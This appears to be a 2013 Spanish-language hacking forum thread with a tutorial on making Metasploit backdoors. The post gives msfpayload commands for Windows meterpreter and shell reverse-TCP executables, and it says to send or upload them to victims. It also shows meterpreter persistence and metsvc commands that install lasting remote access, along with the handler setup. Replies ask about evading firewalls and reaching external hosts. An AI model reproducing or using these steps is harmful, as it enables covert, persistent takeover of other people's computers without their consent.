Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: J0k3$ en Agosto 18, 2013, 11:09:09 PM

Título: Como crear backdoors en metasploit.[Algunos tipos]
Publicado por: J0k3$ en Agosto 18, 2013, 11:09:09 PM
(http://blog.zerial.org/wp-content/uploads/2010/03/spying-233x300.jpg)
¿Que es una backdoor?
Es un programa, que ayuda al atacante a tener un acceso al pc, constante , o a dejar accesos a otros intrusos , por cualquier cuestión , es algo que deja vulnerado a tu pc al 100%.

Backdoor Meterpreter

Hoy os enseñare a hacer backdoors con metasploit, los distintos backdoors que hay :-D empecemos...Aclaro una cosa, con cualquier payload de meterpreter puedes hacer backdoor's acá les explicare unos cuantos , pero es para que investiguen ustedes :-D....
Backdoor Meterpreter.
Este backdoor, es del meterpreter para el que no sepa que es, es el "troyano" que usa metasploit,  digo troyano porque trae unas funciones añadidas, en mi opinión el mas recomendable de los backdoor ... Empecemos se crea de una forma muy sencilla ..... abren la consola y escriben...

sudo msfpayload windows/meterpreter/reverse_tcp LHOST="Ip/No-Ip" LPORT="Puerto" X > "Ruta donde se guardara/Elnombrequequieras.exe"


Bueno , seria el típico Backdoors , seria subírselo a alguien o ponerlo para descargar y finiquitado :-D , bueno y ahora te estarás preguntando......como recibo yo la conexión de este backdoor y de cualquiera de los que veremos hoy, con el exploit, que se llama "exploit/multi/handler" con eso recibiremos todas las conexiones de nuestro backdoor, veamos un ejemplo de recibir conexiones....

(http://2.bp.blogspot.com/-ik1lUGg5ouk/T0AO1JxzeZI/AAAAAAAAAHE/Hofh3wdDiCM/s1600/Hack+any+Windows+7+with+Metasploit+2+-+Monta+VIP.png)


Lo ven? consiguió una sesión , sencillo no? :-) , bueno este seria uno de los backdoors que hay, expliquemos unos cuantos mas ;-)

Backdoors Consola.
Este backdoor, tan simple te da la consola/terminal/prompt bueno cualquier interprete de comandos que allá en el S.O este es sencillo .....

msfpayload windows/shell/reverse_tcp LHOST="Tu ip/noip" LPORT="Puerto" X > "ruta/elnombrequequieras.exe"

y ya esta ahora os enseño una foto de como sería....Ya saben se tiene que ejecutar en la "maquina victima".
(https://lh5.googleusercontent.com/-WvpU8kcVwQM/UhF1BfjYUsI/AAAAAAAAAOM/uU4QfL81Zgk/w1044-h563-no/Captura+de+pantalla+2013-08-19+03%253A24%253A32.png)
Bueno, aquí se ve la shell obtenida! :D ...pasemos a otro...

Backdoor Persistence.
Este backdoor es persistence, un comando que trae el meterpreter , podemos ver los comandos poniendo "run persistence -h" dentro del meterpreter.....
(https://lh3.googleusercontent.com/-V3MoB_SxrVE/UhF4Yg6epvI/AAAAAAAAAOc/8ImCuIRR3eE/w903-h356-no/Captura+de+pantalla+2013-08-19+03%253A42%253A01.png)
Hay ven la información sencillo no? :D bueno pues esto se usa para darnos acceso constante a una maquina, o yo tambien la uso para darme acceso a mi mismo tener varias sesiones por si falla alguna , jeje soy malvado xD jaja :D bueno para usar este comando como ven hay en los parametros solamente pondremos..
      run  persistence -U -i -p 1234 -r "ip"
Bueno analizamos un poco, la "-U" es para que cuando el usuario inicie, lo haga también nuestra backdoors , la "-i" es el intervalo de conexión en este caso ninguno , la "-p" el puerto  inventado hay pongan el que tengan abierto xD :D  , y la "-r" es para la ip/noip a la que se le va a conectar la suya o la de su amigo para darle acceso ..... y les sale algo parecido a esto...
(http://2.bp.blogspot.com/-YtUOvGzwajk/UGBz6bFXE3I/AAAAAAAAAOE/_bXLRIitlIE/s1600/persistence.png)
Bueno hay se ve, como lo pone en el registro, la pid ...etc bueno y como vemos si nos fijamos bien usa el backdoor meterpreter (PAYLOAD) del que os hable antes :-D lo pueden modificar , en la ruta del script y cambiarlo por el que quieran como una VNC o algo así .... :-D
Despues en un handler  , y el payload de el primer backdoor.... como el que vimos colocamos los datos en ese caso (el de la foto) pondríamos de LHOST 192.168.1.87 y en el del puerto 4443 , y nos daría la sesión cuando se conectara :D.......

Backdoors Metsvc.

Este es mas fácil que el otro , porque es un servicio que se instala en la pc victima, y con solo poner en meterpreter este comando.....
run metsvc -A
y ya se les instalaría solo , si ponen run metsvc -h , verán que hay muy pocos comando solo ese y 2 mas y uno es para desinstalar el servicio , muy útil , bueno acá unas fotos de como se instala automáticamente ....
(http://pentestlab.files.wordpress.com/2012/03/29.png)

Bueno , para interactuar con este, colocan el handler pero de payload ponen :

set PAYLOAD windows/metsvc_bind_tcp

y rellenan los datos correspondientes... :-) con show options , y lo configuran..


Saludos de vuestro amigo J0K3$, y muchas gracias al amigo de Antrax. Salu2 Underc0der.

No se dejen nada abierto ;D
(http://2.bp.blogspot.com/-7IemjbNbuKk/UJvgpfUIwcI/AAAAAAAAHnw/nXQmnuKAdT0/s1600/matrixdoor.png)
Título: Re:Como crear backdoors en metasploit.[Algunos tipos]
Publicado por: Ricardini en Agosto 22, 2013, 09:22:32 AM
sabes eludir el firewall activo me podrias decir como le haces le pongo este payload y nada

windows/meterpreter/reverse_tcp_allports
Título: Re:Como crear backdoors en metasploit.[Algunos tipos]
Publicado por: pelumon en Septiembre 23, 2013, 11:20:41 PM
esto es para local host?? pero para host extrenos como se hace?? se que ahy que cambiar ip privada por la ip extrena pero ya lo e intentado y no eh podido mas que en lhost. buena info!! salu2!1
Título: Re:Como crear backdoors en metasploit.[Algunos tipos]
Publicado por: TrollMine en Septiembre 25, 2013, 11:39:17 AM
Abre los puertos pelumon, y te tiene que ir si o si, a no ser, que metasploit lo tengas en una maquina virtual, entonces:
(http://i.imgur.com/E0WtJCs.png)
Título: Re:Como crear backdoors en metasploit.[Algunos tipos]
Publicado por: pelumon en Septiembre 26, 2013, 01:42:08 AM
ise un ejecutable y si me funciono con red diferente, entro a mi router y pongo mi maquina en dnz y ahora si en set lhost pongo mi ip extrena y funciona, pero no me pasa lo mismo con set solo me funciona en lhost?? sabes como??? salu2!!!